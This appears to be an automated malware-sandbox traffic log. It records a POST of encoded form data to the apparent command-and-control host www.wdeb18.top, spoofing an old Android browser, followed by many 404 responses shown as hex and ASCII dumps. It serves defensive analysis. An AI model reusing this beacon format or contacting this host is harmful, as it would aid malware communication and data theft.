        Source: unknownHTTP traffic detected: POST /66vh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.wdeb18.topContent-Type: application/x-www-form-urlencodedContent-Length: 2161Connection: closeCache-Control: no-cacheOrigin: http://www.wdeb18.topReferer: http://www.wdeb18.top/66vh/User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 30 30 79 70 3d 70 5a 46 52 37 58 55 78 4a 2f 63 4b 30 39 36 50 66 46 72 70 78 47 5a 63 69 4f 77 52 46 68 7a 2b 70 72 74 6b 63 46 64 6f 48 72 65 70 4a 44 49 6b 73 4a 6c 47 74 62 69 6f 58 59 74 45 41 4d 39 70 45 37 4f 6c 2f 75 6d 6c 52 76 48 77 46 4f 79 76 56 78 47 73 58 6b 77 37 4d 53 66 54 53 4c 58 59 75 51 68 6e 58 32 64 79 67 56 33 44 4c 74 34 4b 53 76 41 35 67 7a 6d 4c 66 30 58 4b 36 79 6f 47 43 35 76 66 5a 43 63 31 70 61 58 74 57 74 68 61 38 6f 73 57 68 42 32 53 66 36 33 48 34 6c 38 35 58 48 7a 34 39 41 6f 32 57 4e 32 75 42 50 58 76 51 37 6b 75 59 62 48 33 6e 6c 66 6f 65 64 64 4f 2f 74 48 32 6f 75 74 42 6d 62 5a 6e 75 34 59 69 4c 71 69 30 37 76 67 78 4d 56 65 4c 33 69 66 42 73 71 74 6e 52 5a 63 2f 4d 6b 59 5a 75 33 7a 69 57 4c 75 35 44 4b 72 6d 4c 31 78 74 50 4b 4a 4c 31 68 62 7a 4a 61 7a 6d 74 61 77 79 58 4e 54 71 55 6f 36 56 45 32 47 56 70 5a 38 43 37 36 72 39 48 70 54 77 62 54 4f 6f 70 37 4e 72 76 31 66 53 49 42 57 42 75 7a 64 67 38 54 48 64 42 74 52 75 49 39 36 32 4d 2b 4c 66 38 67 73 65 70 57 30 6c 6d 54 42 52 46 38 52 6a 55 37 46 37 39 74 39 66 66 77 59 62 4c 42 65 70 55 70 47 67 30 77 53 33 4d 2f 6a 65 51 32 67 7a 4c 55 50 58 69 65 68 55 46 65 4e 67 6c 45 72 78 2f 6f 55 35 33 63 69 6b 67 54 6f 46 41 6a 35 6a 32 4a 6c 68 57 57 57 71 37 61 59 52 30 77 44 47 64 6c 62 49 37 34 65 35 35 78 46 63 44 39 6f 64 6c 45 53 4d 39 32 70 69 34 57 59 67 77 46 38 57 61 57 4e 68 70 2f 58 2f 46 6f 39 4c 63 65 61 46 72 47 39 41 6a 4e 61 64 64 6e 62 4d 48 6b 78 6a 46 72 6c 76 52 43 6a 4a 62 2f 2b 47 66 76 50 41 65 68 46 6c 54 75 57 58 37 42 75 42 53 34 45 64 61 52 79 2b 58 35 45 52 56 44 76 6e 39 67 37 53 59 4e 49 35 52 41 78 31 7a 31 2b 42 46 48 54 62 57 37 30 31 2b 4b 33 77 47 41 53 6d 72 38 77 72 70 51 39 4f 38 63 45 32 4e 4d 78 66 36 68 7a 39 4d 64 51 46 45 4b 30 4d 57 2f 6b 38 64 59 49 4c 31 46 76 43 57 48 78 68 69 33 39 2f 2b 56 2b 71 75 73 53 73 37 74 39 55 6d 6b 5a 6d 30 75 31 6a 57 6e 6b 4c 7a 49 33 64 34 43 63 52 59 70 53 56 37 79 79 4f 31 6c 71 30 6b 41 34 33 61 43 31 6a 58 58 30 5a 6e 51 35 78 36 4a 6c 50 6d 46 63 34 71 65 68 79 2b 6e 67 36 52 79 64 78 37 63 4b 68 36 4a 34 45 41 70 77 7a 38 64 4e 74 47 4a 66 6a 36 73 64 59 67 44 51 31 73 43 58 39 78 4a 39 5a 4c 56 33 6e 64 57 37 72 4a 58 47 78 54 32 54 6c 33 72 32 54 68 73 72 64 4b 44 51 74 30 58 4b 71 7a 59 36 4d 4f 79 4f 66 50 6a 57 32 65 6e 7a 4a 55 39 56 38 6c 7a 41 7a 36 48 44 6e 74 71 53 34 72 66 4b 62 35 4b 39 77 79 42 49 30 37 52 4e 42 59 52 4f 6d 49 32 2f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Sep 2024 13:04:24 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Sep 2024 13:04:27 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Sep 2024 13:04:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Sep 2024 13:04:32 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Sep 2024 13:04:38 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Sep 2024 13:04:40 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Sep 2024 13:04:43 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Sep 2024 13:04:45 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Sep 2024 13:04:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Sep 2024 13:04:54 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Sep 2024 13:04:56 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Sep 2024 13:04:59 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 